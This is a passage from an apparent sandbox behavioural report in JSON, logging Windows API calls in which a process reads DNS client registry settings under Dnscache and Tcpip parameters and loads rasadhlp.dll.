            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1207
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedffac19f",
            "parentcaller": "0x7ffedff9cb2c",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters"
              },
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters"
              }
            ],
            "repeated": 0,
            "id": 1208
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedffac1db",
            "parentcaller": "0x7ffedff9cb2c",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\Windows NT\\DnsClient"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient"
              }
            ],
            "repeated": 0,
            "id": 1209
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x00000000",
            "parentcaller": "0x00000000",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "System\\CurrentControlSet\\Services\\DNS"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\DNS"
              }
            ],
            "repeated": 0,
            "id": 1210
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "QueryAdapterName"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryAdapterName"
              }
            ],
            "repeated": 0,
            "id": 1211
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9ce73",
            "parentcaller": "0x7ffedff9cee6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "ValueName",
                "value": "DisableAdapterDomainName"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DisableAdapterDomainName"
              }
            ],
            "repeated": 0,
            "id": 1212
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "UseDomainNameDevolution"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseDomainNameDevolution"
              }
            ],
            "repeated": 0,
            "id": 1213
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9ce73",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "ValueName",
                "value": "UseDomainNameDevolution"
              },
              {
                "name": "Data",
                "value": "1"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UseDomainNameDevolution"
              }
            ],
            "repeated": 0,
            "id": 1214
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "DomainNameDevolutionLevel"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DomainNameDevolutionLevel"
              }
            ],
            "repeated": 0,
            "id": 1215
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "PrioritizeRecordData"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\PrioritizeRecordData"
              }
            ],
            "repeated": 0,
            "id": 1216
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9ce73",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "ValueName",
                "value": "PrioritizeRecordData"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\PrioritizeRecordData"
              }
            ],
            "repeated": 0,
            "id": 1217
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "AllowUnqualifiedQuery"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AllowUnqualifiedQuery"
              }
            ],
            "repeated": 0,
            "id": 1218
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9ce73",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "ValueName",
                "value": "AllowUnqualifiedQuery"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\AllowUnqualifiedQuery"
              }
            ],
            "repeated": 0,
            "id": 1219
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "AppendToMultiLabelName"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AppendToMultiLabelName"
              }
            ],
            "repeated": 0,
            "id": 1220
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "ScreenBadTlds"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenBadTlds"
              }
            ],
            "repeated": 0,
            "id": 1221
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "ScreenUnreachableServers"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenUnreachableServers"
              }
            ],
            "repeated": 0,
            "id": 1222
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "ScreenDefaultServers"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenDefaultServers"
              }
            ],
            "repeated": 0,
            "id": 1223
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "DynamicServerQueryOrder"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DynamicServerQueryOrder"
              }
            ],
            "repeated": 0,
            "id": 1224
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "FilterClusterIp"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\FilterClusterIp"
              }
            ],
            "repeated": 0,
            "id": 1225
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "WaitForNameErrorOnAll"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\WaitForNameErrorOnAll"
              }
            ],
            "repeated": 0,
            "id": 1226
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "UseEdns"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseEdns"
              }
            ],
            "repeated": 0,
            "id": 1227
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "DnsSecureNameQueryFallback"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsSecureNameQueryFallback"
              }
            ],
            "repeated": 0,
            "id": 1228
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "EnableDAForAllNetworks"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableDAForAllNetworks"
              }
            ],
            "repeated": 0,
            "id": 1229
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "DirectAccessQueryOrder"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessQueryOrder"
              }
            ],
            "repeated": 0,
            "id": 1230
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "QueryIpMatching"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryIpMatching"
              }
            ],
            "repeated": 0,
            "id": 1231
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee10be6a1",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\rasadhlp.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed87c0000"
              }
            ],
            "repeated": 0,
            "id": 1232
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee10be6a1",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffed87c0000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "C:\\Windows\\System32\\rasadhlp.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 1233
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "RegistrationTtl"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationTtl"
              }
            ],
            "repeated": 0,
            "id": 1234
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9ce73",
            "parentcaller": "0x7ffedff9cee6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "ValueName",
                "value": "DefaultRegistrationTTL"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationTTL"
              }
            ],
            "repeated": 0,
            "id": 1235
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "RegistrationRefreshInterval"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationRefreshInterval"
              }
            ],
            "repeated": 0,
            "id": 1236
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9ce73",
            "parentcaller": "0x7ffedff9cee6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "ValueName",
                "value": "DefaultRegistrationRefreshInterval"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationRefreshInterval"
              }
            ],
            "repeated": 0,
            "id": 1237
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "RegistrationMaxAddressCount"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationMaxAddressCount"
              }
            ],
            "repeated": 0,
            "id": 1238
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9ce73",
            "parentcaller": "0x7ffedff9cee6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "ValueName",
                "value": "MaxNumberOfAddressesToRegister"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\MaxNumberOfAddressesToRegister"
              }
            ],
            "repeated": 0,
            "id": 1239
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "UpdateSecurityLevel"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateSecurityLevel"
              }
            ],
            "repeated": 0,
            "id": 1240
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9ce73",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "ValueName",
                "value": "UpdateSecurityLevel"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UpdateSecurityLevel"
              }
            ],
            "repeated": 0,
            "id": 1241
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "UpdateTopLevelDomainZones"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateTopLevelDomainZones"
              }
            ],
            "repeated": 0,
            "id": 1242
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "DowncaseSpnCauseApiOwnerIsTooLazy"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DowncaseSpnCauseApiOwnerIsTooLazy"
              }
            ],
            "repeated": 0,
            "id": 1243
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "RegistrationOverwrite"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationOverwrite"
              }
            ],
            "repeated": 0,
            "id": 1244
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "MaxCacheSize"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheSize"
              }
            ],
            "repeated": 0,
            "id": 1245
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "MaxCacheTtl"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheTtl"
              }
            ],
            "repeated": 0,
            "id": 1246
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "MaxNegativeCacheTtl"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxNegativeCacheTtl"
              }
            ],
            "repeated": 0,
            "id": 1247
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "AdapterTimeoutLimit"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AdapterTimeoutLimit"
              }
            ],
            "repeated": 0,
            "id": 1248
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "ServerPriorityTimeLimit"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ServerPriorityTimeLimit"
              }
            ],
            "repeated": 0,
            "id": 1249
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "MaxCachedSockets"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCachedSockets"
              }
            ],
            "repeated": 0,
            "id": 1250
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "DisableServerUnreachability"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableServerUnreachability"
              }
            ],
            "repeated": 0,
            "id": 1251
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "EnableMulticast"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMulticast"
              }
            ],
            "repeated": 0,
            "id": 1252
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "MulticastResponderFlags"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastResponderFlags"
              }
            ],
            "repeated": 0,
            "id": 1253
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "MulticastSenderFlags"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderFlags"
              }
            ],
            "repeated": 0,
            "id": 1254
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "MulticastSenderMaxTimeout"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderMaxTimeout"
              }
            ],
            "repeated": 0,
            "id": 1255
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
